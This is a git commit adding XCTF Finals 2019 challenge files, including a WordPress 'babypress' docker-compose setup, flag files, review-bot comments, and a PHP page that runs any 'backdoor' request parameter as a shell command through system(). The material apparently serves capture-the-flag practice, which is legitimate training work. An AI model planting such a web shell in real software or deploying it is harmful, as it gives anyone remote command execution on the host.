
Add XCTF Finals 2019

stypr committed Oct 27, 2019
1 parent ef22dc7 commit 72e3c0c682f1bcd5b12f951b16db1f36d65a0388
@@ -0,0 +1,5 @@
## XCTF Finals 2019

No writeups this time. Try them for fun!

![Scoreboard](scoreboard.jpg)
@@ -0,0 +1,5 @@
## babypress

Let's dig down into the easy baby-level wordpress 0day(?) exploitation!

by stypr
Binary file not shown.
@@ -0,0 +1,53 @@
version: '3.3'

services:
db:
image: mysql:5.7
volumes:
- my_data:/var/lib/mysql
networks:
- default
restart: always
environment:
MYSQL_ROOT_PASSWORD: secret_password
MYSQL_DATABASE: stypr
MYSQL_USER: stypr
MYSQL_PASSWORD: stypr

wordpress:
image: wordpress:latest
depends_on:
- db
ports:
- "8000:80"
networks:
- default
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: stypr
WORDPRESS_DB_PASSWORD: stypr
WORDPRESS_DB_NAME: stypr

backdoor:
image: trafex/alpine-nginx-php7
depends_on:
- db
- wordpress
volumes:
- ./flag:/flag:ro
- ./index.php:/var/www/html/index.php:ro
networks:
- default
restart: always

networks:
default:
driver: bridge
ipam:
driver: default
config:
- subnet: 13.37.137.0/24

volumes:
my_data: {}
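Review bot: The `subnet: 13.37.137.0/24` in the `networks` block near the end is outside the RFC 1918 private ranges, so a host that brings this stack up will send traffic for that public /24 to the local bridge instead of the internet; unless the challenge depends on those exact addresses, a private range such as `- subnet: 10.13.37.0/24` avoids that. `image: wordpress:latest` and the untagged `image: trafex/alpine-nginx-php7` also float, so a later pull can give a different WordPress or PHP build than the one the challenge was written against; pinning each to the tag or digest used at the event, e.g. `image: wordpress:<tag-used-at-event>`, keeps it reproducible. The database passwords are committed in plain text, which is presumably acceptable for a throwaway challenge, but a one-line comment above `environment:` saying they are challenge-only values and must not be reused would make that explicit.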
@@ -0,0 +1 @@
flag{stypr}
@@ -0,0 +1,20 @@
<?php

$backdoor = $_REQUEST['backdoor'];
if($backdoor){
@system($backdoor . " 2>&1");
}

?>
<!doctype html>
<html>
<head>
<title>stypr's secret backdoor</title>
</head>
<body>
<form method=POST action=index.php>
<input type="text" name="backdoor" value="backdoor">
<input type="submit" value="backdoor()">
</form>
</body>
</html>
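Review bot: Nothing in this file states that passing the request parameter straight to `system()` is the deliberate challenge target, and the compose file on this page publishes no port for the service that mounts `index.php`, so that network layout is the only thing keeping the script off the host's interfaces. I would add a header comment such as `// Intentional CTF target: runs the 'backdoor' request parameter as a shell command; never publish this container's port or reuse it outside the challenge network.` Separately, `$_REQUEST['backdoor']` is read without a presence check, so a plain page load raises an undefined-index notice; `$backdoor = $_REQUEST['backdoor'] ?? '';` keeps the behaviour and removes the notice. The form declares `method=POST` while `$_REQUEST` also accepts the query string, so if GET access is not part of the intended solution, `$_POST` would match the form.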
@@ -0,0 +1 @@
Hint: Environment
@@ -0,0 +1,7 @@
<?php
$flag = "FLAG{this_surely_is_a_leg1timate_f!le_1nclusion}";

if(stripos($_SERVER['SCRIPT_NAME'], "flag.php") !== false){
die("<!-- flag.php successfully loaded. -->");
}
?>
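Review bot: The direct-access guard matches on the substring `flag.php` in `SCRIPT_NAME`, so it also fires for any including script whose path happens to contain that string, and it offers no protection if the file is ever served without PHP execution, in which case the `$flag` literal goes out as plain text. A comment above the `if` stating that the file is meant to be included rather than requested would make the intent clear, e.g. `// Meant to be include()d by the challenge; a direct request only gets the marker below.` I would also drop the closing `?>` so the trailing newline is not emitted into the including page's output.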
